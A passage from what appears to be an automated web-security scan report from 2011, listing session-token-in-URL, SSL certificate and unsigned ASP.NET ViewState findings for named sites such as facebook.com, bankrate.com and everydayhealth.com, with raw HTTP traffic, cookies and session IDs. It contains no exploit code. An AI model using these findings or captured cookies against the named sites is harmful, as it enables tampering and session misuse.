lation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&sdk=joey&session_version=3

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /extern/login_status.php?api_key=132151116822711&app_id=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12aabd56%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13c0616c4%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23792e5e8%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d6b0d054%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24e5b0ab%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.115.59
X-Cnection: close
Date: Thu, 05 May 2011 00:57:31 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

8. SSL certificate previous next
There are 4 instances of this issue:

https://www.facebook.com/
https://www.fightmagazine.com/
https://www.godaddy.com/
https://www.neodata.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

8.1. https://www.facebook.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	www.facebook.com
Issued by:	DigiCert High Assurance CA-3
Valid from:	Sun Nov 14 18:00:00 CST 2010
Valid to:	Mon Dec 02 17:59:59 CST 2013

Certificate chain #1

Issued to:	DigiCert High Assurance CA-3
Issued by:	DigiCert High Assurance EV Root CA
Valid from:	Mon Apr 02 19:00:00 CDT 2007
Valid to:	Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:	DigiCert High Assurance EV Root CA
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Sun Oct 01 00:00:00 CDT 2006
Valid to:	Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 11:09:40 CDT 1999
Valid to:	Sat May 25 11:39:40 CDT 2019

8.2. https://www.fightmagazine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.fightmagazine.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.fightmagazine.com
Issued by:	Thawte SSL CA
Valid from:	Mon Apr 04 19:00:00 CDT 2011
Valid to:	Thu May 03 18:59:59 CDT 2012

Certificate chain #1

Issued to:	Thawte SSL CA
Issued by:	thawte Primary Root CA
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	thawte Primary Root CA
Issued by:	Thawte Premium Server CA
Valid from:	Thu Nov 16 18:00:00 CST 2006
Valid to:	Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:	Thawte Premium Server CA
Issued by:	Thawte Premium Server CA
Valid from:	Wed Jul 31 19:00:00 CDT 1996
Valid to:	Fri Jan 01 17:59:59 CST 2021

8.3. https://www.godaddy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.GoDaddy.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Tue Jan 04 10:21:18 CST 2011
Valid to:	Mon Jan 14 16:28:36 CST 2013

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 CST 2006
Valid to:	Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Tue Jun 29 12:06:20 CDT 2004
Valid to:	Thu Jun 29 12:06:20 CDT 2034

8.4. https://www.neodata.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.neodata.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.neodata.com
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Mon Aug 17 19:00:00 CDT 2009
Valid to:	Sun Sep 04 18:59:59 CDT 2011

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 19:00:00 CDT 1997
Valid to:	Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

9. ASP.NET ViewState without MAC enabled previous next
There are 5 instances of this issue:

http://www.bankrate.com/funnel/mortgages/
http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx
http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx
http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx
http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

9.1. http://www.bankrate.com/funnel/mortgages/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bankrate.com
Path:	/funnel/mortgages/

Request

GET /funnel/mortgages/ HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: a-brmweb02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:56:19 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:56:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link type="text/css"
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQxNTkyMzg4Mg9kFgJmD2QWAgIID2QWBAIWD2QWAgIBD2QWCGYPZBYCZg9kFgQCAQ9kFgJmD2QWBmYPEGQQFTQMU2VsZWN0IFN0YXRlB0FsYWJhbWEGQWxhc2thB0FyaXpvbmEIQXJrYW5zYXMKQ2FsaWZvcm5pYQhDb2xvcmFkbwtDb25uZWN0aWN1dAhEZWxhd2FyZRREaXN0cmljdCBvZiBDb2x1bWJpYQdGbG9yaWRhB0dlb3JnaWEGSGF3YWlpBUlkYWhvCElsbGlub2lzB0luZGlhbmEESW93YQZLYW5zYXMIS2VudHVja3kJTG91aXNpYW5hBU1haW5lCE1hcnlsYW5kDU1hc3NhY2h1c2V0dHMITWljaGlnYW4JTWlubmVzb3RhC01pc3Npc3NpcHBpCE1pc3NvdXJpB01vbnRhbmEITmVicmFza2EGTmV2YWRhDU5ldyBIYW1wc2hpcmUKTmV3IEplcnNleQpOZXcgTWV4aWNvCE5ldyBZb3JrDk5vcnRoIENhcm9saW5hDE5vcnRoIERha290YQRPaGlvCE9rbGFob21hBk9yZWdvbgxQZW5uc3lsdmFuaWEMUmhvZGUgSXNsYW5kDlNvdXRoIENhcm9saW5hDFNvdXRoIERha290YQlUZW5uZXNzZWUFVGV4YXMEVXRhaAdWZXJtb250CFZpcmdpbmlhCldhc2hpbmd0b24NV2VzdCBWaXJnaW5pYQlXaXNjb25zaW4HV3lvbWluZxU0AAJBTAJBSwJBWgJBUgJDQQJDTwJDVAJERQJEQwJGTAJHQQJISQJJRAJJTAJJTgJJQQJLUwJLWQJMQQJNRQJNRAJNQQJNSQJNTgJNUwJNTwJNVAJORQJOVgJOSAJOSgJOTQJOWQJOQwJORAJPSAJPSwJPUgJQQQJSSQJTQwJTRAJUTgJUWAJVVAJWVAJWQQJXQQJXVgJXSQJXWRQrAzRnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCAg8WAh4Fc3R5bGUFDmRpc3BsYXk6IG5vbmU7ZAIDDxYCHwAFDmRpc3BsYXk6IG5vbmU7ZAICD2QWAmYPZBYEZg8PZBYCHgdvbmtleXVwBZABWmlwQ29kZVNlbGVjdG9yLkNoZWNrWmlwQ29kZSh0aGlzLnZhbHVlLCQoJ2N0bDAwX3dlbGxfTW9ydGdhZ2VGdW5uZWxTdGFydF9TdGF0ZUNpdHlaaXBTZWxlY3Rvcl9TdGF0ZUNpdHlaaXBUYWJzX1ppcFRhYl9aaXBDb2RlU2VsZWN0b3JfY3RsMDAnKSk7ZAIBDxYCHwAFDmRpc3BsYXk6IG5vbmU7ZAIBDw8WAh4EVGV4dAUGMTY1MDAwZGQCAw8QZGQWAWZkAgQPD2QWAh4Hb25jbGljawVMJCgnYXNwbmV0Rm9ybScpLm9uc3VibWl0PWZ1bmN0aW9uKCl7cmV0dXJuIE1vcnRnYWdlU3RhcnQuVmFsaWRhdGVVcGRhdGUoKTt9O2QCHA9kFgJmD2QWAgIBD2QWAgIBDxYCHwIF2wkNCiA8IS0tIEJsdWVrYWkgUHJvdmlkZXIgVGFncyAtLT4NCiA8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4NCgkgaWYgKHR5cGVvZihQYWdlTWFuYWdlcikgIT0gInVuZGVmaW5lZCIgICYmIFBhZ2VNYW5hZ2VyIT1udWxsICYmIFBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YSE9bnVsbCkNCgkJew0KCQkgdmFyIHBhckxpc3Q9IiI7DQoJCSB2YXIgZXhjTGlzdD0iIjsNCgkJICBpZiAoIVBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YS5Db250YWluc0tleSgnQmx1ZUthaVBhcmEnKSkNCgkJCVBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YS5BZGQoJ0JsdWVLYWlQYXJhJywnTG9jYXRpb24sS2V5d29yZHMsQ2F0ZWdvcnknKTsNCg0KCQkgcGFyTGlzdD0gUGFnZU1hbmFnZXIuUGFnZU1ldGFEYXRhLlZhbHVlc1snQmx1ZUthaVBhcmEnXS5zcGxpdCgiLCIpOw0KCQkgZm9yKHZhciBpPTA7IGk8cGFyTGlzdC5sZW5ndGg7IGkrKykNCgkJCXsNCgkJCQkgaWYgKFBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YS5Db250YWluc0tleShwYXJMaXN0W2ldKSkNCgkJCQkJCXsNCgkJCQkJCQkgYmtfYWRkUGFnZUN0eChwYXJMaXN0W2ldLFBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YS5WYWx1ZXNbcGFyTGlzdFtpXV0pOw0KCQkJCQkJfQ0KCQkJfSANCgkJCQ0KCQl9DQoJIGlmKCFJc051bGxvclVuZGVmaW5lZChDb29raWVNYW5hZ2VyKSAmJiAhSXNOdWxsb3JVbmRlZmluZWQoQ29va2llTWFuYWdlci5PcGVuKCdicm1iaycpLkdldCgnQktVRCcpKSkgDQoJCXsNCgkJIHZhciB1c2VydmFsPUNvb2tpZU1hbmFnZXIuT3BlbignYnJtYmsnKS5HZXQoJ0JLVUQnKTsNCgkJIGZvcih2YXIgaT0wOyBpPCB1c2VydmFsLnNwbGl0KCcsJykubGVuZ3RoIDsgaSsrKQ0KCQkJCSB7DQoJCQkJICAgaWYodXNlcnZhbC5zcGxpdCgnLCcpW2ldLnNwbGl0KCc6JykubGVuZ3RoID4gMSAmJiAoSXNOdWxsb3JVbmRlZmluZWQoZXhjTGlzdCkgfHwgZXhjTGlzdC5zcGxpdCgnLCcpLmluZGV4T2YodXNlcnZhbC5zcGxpdCgnLCcpW2ldLnNwbGl0KCc6JylbMF0pIDwgMCApKQ0KCQkJCQkJCSBia19hZGRVc2VyQ3R4KHVzZXJ2YWwuc3BsaXQoJywnKVtpXS5zcGxpdCgnOicpWzBdLHVzZXJ2YWwuc3BsaXQoJywnKVtpXS5zcGxpdCgnOicpWzFdKTsNCgkJCSB9DQoJCQkgQ29va2llTWFuYWdlci5EZWxldGUoJ2JybWJrJyk7DQoJCX0NCgkgYmtfZG9KU1RhZygyMzExLCA0KTsNCgkgPC9zY3JpcHQ+DQo8IS0tIEVuZCBCbHVla2FpIFRhZ3MgLS0+ZGQ=" />
...[SNIP]...

9.2. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/allergy/climate-change-and-allergies.aspx

Request

GET /allergy/climate-change-and-allergies.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:31 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO4hyeM5MDY2ODIwZC0xMWZhLTRjODktOGQzNS03NzFlZGNmNzhkODY1; expires=Wed, 13-Jul-2011 21:36:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ahsac155xnki2v55pzjexlmb; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49105

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
Can Climate Change Cause Allergy? - Allergy Center - Every
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAX7Bg0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSJDYW4gQ2xpbWF0ZSBDaGFuZ2UgQ2F1c2UgQWxsZXJneT8gLSBBbGxlcmd5IENlbnRlciAtIEV2ZXJ5ZGF5IEhlYWx0aCIvPg0KPG1ldGEgcHJvcGVydHk9Im9nOmRlc2NyaXB0aW9uIiAgcnVuYXQ9InNlcnZlciIgIGlkPSJmYmRlc2NyaXB0aW9uIiBjb250ZW50PSJHbG9iYWwgd2FybWluZyBjb3VsZCBiZSBhZ2dyYXZhdGluZyB5b3VyIGFsbGVyZ2llcy4gR2V0IGFkdmljZSBvbiBob3cgdG8gZWFzZSBzeW1wdG9tcyBhbmQgY2FyZSBmb3IgYWxsZXJnaWVzIGluIHRvZGF5J3MgZW52aXJvbm1lbnQgYXQgRXZlcnlkYXkgSGVhbHRoLiIgPg0KPG1ldGEgcHJvcGVydHk9Im9nOnR5cGUiIGNvbnRlbnQ9ImFydGljbGUiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6aW1hZ2UiIGNvbnRlbnQ9Imh0dHA6Ly9pbWFnZXMuYWdvcmFtZWRpYS5jb20vZXZlcnlkYXloZWFsdGgvZ2Ntcy9sb2dvX2VoXzUweDUwLmdpZiIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzpzaXRlX25hbWUiIGNvbnRlbnQ9IkV2ZXJ5ZGF5SGVhbHRoLmNvbSIvPg0KPG1ldGEgcHJvcGVydHk9ImZiOmFwcF9pZCIgY29udGVudD0iMTM1MzQ2MDM2NDkwMTg2Ii8+DQo8bWV0YSBwcm9wZXJ0eT0iZmI6YWRtaW5zIiBjb250ZW50PSIiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6dXJsIiBydW5hdD0ic2VydmVyIiBpZD0iZmJ1cmwiIGNvbnRlbnQ9Imh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2FsbGVyZ3kvY2xpbWF0ZS1jaGFuZ2UtYW5kLWFsbGVyZ2llcy5hc3B4IiAvPg0KDQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJodHRwOi8vY29ubmVjdC5mYWNlYm9vay5uZXQvZW5fVVMvYWxsLmpzI3hmYm1sPTEiPjwvc2NyaXB0PmQCAw9kFgICAQ9kFgICAg9kFghmD2QWBGYPDxYCHgdWaXNpYmxlaGRkAgEPZBYCAgEPZBYCZg8PFgQeCENzc0NsYXNzBQp2ZXJ0aWNhbGFkHgRfIVNCAgJkZAICD2QWAgIBD2QWBAIBDw8WAh8ABQ5OZXh0IEFydGljbGU6IGRkAgMPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAVaaHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vaGVhbHRoeS1saXZpbmcvMDIyNS9nbG9iYWwtd2FybWluZy1tYXktcG9zZS1kZWF0aC1yaXNrcy5hc3B4ZBYCZg8VASdHbG9iYWwgICBXYXJtaW5nICBNYXkgUG9zZSBIZWFsdGggUmlza3NkAgMPZBYGAgEPZBYEAgEPDxYCHwAFHVJlbGF0ZWQgQXJ0aWNsZXMgb24gQWxsZXJnaWVzZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFWmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hlYWx0aHktbGl2aW5nLzAyMjUvZ2xvYmFsLXdhcm1pbmctbWF5LXBvc2UtZGVhdGgtcmlza3MuYXNweGQWAmYPFQEnR2xvYmFsICAgV2FybWluZyAgTWF5IFBvc2UgSGVhbHRoIFJpc2tzZAIBD2QWAgIBDw8WAh8FBVlodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9hbGxlcmdpZXMvc3BlY2lhbGlzdHMvaG93LWRvLWktdGVzdC1mb3ItZm9vZC1hbGxlcmdpZXMuYXNweGQWAmYPFQEjSG93IERvIEkgVGVzdCBGb3IgRm9vZCAgQWxsZXJnaWVzID9kAgIPZBYCAgEPDxYCHwUFQmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2FsbGVyZ2llcy9hbGxlcmd5LWJsb29kLXRlc3RpbmcuYXNweGQWAmYPFQEcQmxvb2QgVGVzdGluZyBGb3IgIEFsbGVyZ2llc2QCAg9kFgQCAQ8PFgIfAAUbTW9yZSBvbiBBbGxlcmd5IE1lZGljYXRpb25zZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFMWh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2xpcXVpLWFsbGVyZ3lkFgJmDxUBDkxpcXVpLSBBbGxlcmd5ZAIBD2QWAgIBDw8WAh8FBTNodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9kcnVncy9kYXlxdWlsLWFsbGVyZ3lkFgJmDxUBEERheXF1aWwgIEFsbGVyZ3lkAgIPZBYCAgEPDxYCHwUFNGh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2JlbmFkcnlsLWFsbGVyZ3lkFgJmDxUBEUJlbmFkcnlsICBBbGxlcmd5ZAIDD2QWBAIBDw8WAh8ABRtBc2sgYSBQaGFybWFjaXN0OiBBbGxlcmdpZXNkZAIDDxYCHwQCAxYGZg9kFgICAQ8PFgIfBQV4aHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vaGVhbHRoLXF1ZXN0aW9ucy9kaXVyZXRpY3Mvd2hpY2gtZGl1cmV0aWNzLWNhbi15b3UtdGFrZS1pZi15b3UtYXJlLWFsbGVyZ2ljLXRvLXN1bGZhLWRydWdzZBYCZg8VAUBXaGljaCBEaXVyZXRpY3MgQ2FuIFlvdSBUYWtlIElmIFlvdSBBcmUgQWxsZXJnaWMgVG8gU3VsZmEgRHJ1Z3M/ZAIBD2QWAgIBDw8WAh8FBWxodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL2NhZmZlaW5lL3doYXQtYXJlLXNvbWUtb2YtdGhlLWFsbGVyZ2ljLXN5bXB0b21zLWZyb20tY2FmZmVpbmVkFgJmDxUBNVdoYXQgQXJlIFNvbWUgT2YgVGhlIEFsbGVyZ2ljIFN5bXB0b21zIEZyb20gQ2FmZmVpbmU/ZAICD2QWAgIBDw8WAh8FBW9odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL2FzdGVwcm8vY2FuLWFzdGVwcm8td2VpZ2h0LWdhaW4tY2FuLXNpbmd1bGFpci1jYXVzZS13ZWlyZC1kcmVhbXNkFgJmDxUBOkNhbiBBc3RlcHJvIFdlaWdodCBHYWluPyBDYW4gU2luZ3VsYWlyIENhdXNlIFdlaXJkIERyZWFtcz9kAgcPZBYCAgEPZBYCAgIPDxYCHwFoZGRk" />
...[SNIP]...

9.3. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO6Y*xNkN2I5MjVjYi05YzUzLTRhY2MtYjcwOC03ZmQxMjAzMTMxNGU1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=esw2jyaebe5e2r55rhgfig45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49627

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
Is Cholesterol Treatment Worth It? - EverydayHealth.com
<
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAWGBw0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSJJcyBDaG9sZXN0ZXJvbCBUcmVhdG1lbnQgV29ydGggSXQ/IC0gRXZlcnlkYXlIZWFsdGguY29tIi8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6ZGVzY3JpcHRpb24iICBydW5hdD0ic2VydmVyIiAgaWQ9ImZiZGVzY3JpcHRpb24iIGNvbnRlbnQ9Ik1lZGljYXRpb25zLCBkaWV0LCBleGVyY2lzZSwgb3IgYWxsIHRocmVlIGNhbiB1c3VhbGx5IG1hbmFnZSBjaG9sZXN0ZXJvbC4gU28gaWYgZGlldCBhbmQgZXhlcmNpc2UgY2FuIGxvd2VyIGhpZ2ggY2hvbGVzdGVyb2wsIGlzIG1lZGljYXRpb24gbmVjZXNzYXJ5PyIgPg0KPG1ldGEgcHJvcGVydHk9Im9nOnR5cGUiIGNvbnRlbnQ9ImFydGljbGUiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6aW1hZ2UiIGNvbnRlbnQ9Imh0dHA6Ly9pbWFnZXMuYWdvcmFtZWRpYS5jb20vZXZlcnlkYXloZWFsdGgvZ2Ntcy9sb2dvX2VoXzUweDUwLmdpZiIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzpzaXRlX25hbWUiIGNvbnRlbnQ9IkV2ZXJ5ZGF5SGVhbHRoLmNvbSIvPg0KPG1ldGEgcHJvcGVydHk9ImZiOmFwcF9pZCIgY29udGVudD0iMTM1MzQ2MDM2NDkwMTg2Ii8+DQo8bWV0YSBwcm9wZXJ0eT0iZmI6YWRtaW5zIiBjb250ZW50PSIiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6dXJsIiBydW5hdD0ic2VydmVyIiBpZD0iZmJ1cmwiIGNvbnRlbnQ9Imh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hlYXJ0LWRpc2Vhc2UvY2hvbGVzdGVyb2wvZHJ1Zy10cmVhdG1lbnRzLWZvci1oaWdoLWNob2xlc3Rlcm9sLmFzcHgiIC8+DQoNCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHA6Ly9jb25uZWN0LmZhY2Vib29rLm5ldC9lbl9VUy9hbGwuanMjeGZibWw9MSI+PC9zY3JpcHQ+ZAIDD2QWAgIBD2QWAgICD2QWCGYPZBYEZg8PFgIeB1Zpc2libGVoZGQCAQ9kFgICAQ9kFgJmDw8WBB4IQ3NzQ2xhc3MFCnZlcnRpY2FsYWQeBF8hU0ICAmRkAgIPZBYCAgEPZBYEAgEPDxYCHwAFDk5leHQgQXJ0aWNsZTogZGQCAw8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgICAQ8PFgIeC05hdmlnYXRlVXJsBU5odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oaWdoLWNob2xlc3Rlcm9sL2hpZ2gtY2hvbGVzdGVyb2wtdHJlYXRtZW50LmFzcHhkFgJmDxUBHkhpZ2ggICBDaG9sZXN0ZXJvbCAgIFRyZWF0bWVudGQCAw9kFgYCAg9kFgQCAQ8PFgIfAAUkUmVsYXRlZCB